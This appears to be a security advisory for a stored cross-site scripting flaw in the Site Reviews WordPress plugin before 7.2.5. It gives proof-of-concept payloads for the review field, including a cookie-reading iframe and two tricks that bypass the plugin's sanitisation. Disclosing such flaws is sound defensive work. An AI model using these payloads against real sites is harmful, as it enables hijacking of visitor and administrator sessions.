Site Reviews < 7.2.5 – Unauthenticated Stored XSS | CVE 2025-1232

Description

The plugin does not properly sanitise and escape some of its Review fields, which could allow unauthenticated users to perform Stored XSS attacks

Proof of Concept

As unauthenticated, open a page/post with a "Review Form" block in it, put the following payload in the "Your review" field and submit the form (add dummy data to the other fields): &amp;amp;amp;amp;amp;amp;amp;amp;lt;iframe src=javascript:alert(document.cookie)&amp;amp;amp;amp;amp;amp;amp;amp;gt;

The XSS will be triggered in any page/post with the "Latest Reviews" block embed, as well as when an admin will edit a page/post containing such block

Other possible payloads showing that even though the plugin has some sanitisation in place trying to prevent such XSS, it can be easily bypassed:
- &amp;amp;amp;amp;amp;amp;amp;amp;lt;img src ooooonerror=nerror=nerror=nerror=nerror=alert(/XSS/)&amp;amp;amp;amp;amp;amp;amp;amp;gt;

- &amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=x style=animation-name:rotation onanimationstart=alert(/XSS/)//&amp;amp;amp;amp;amp;amp;amp;amp;gt; which will execute when an admin will edit a post/page containing the "Latest Reviews" block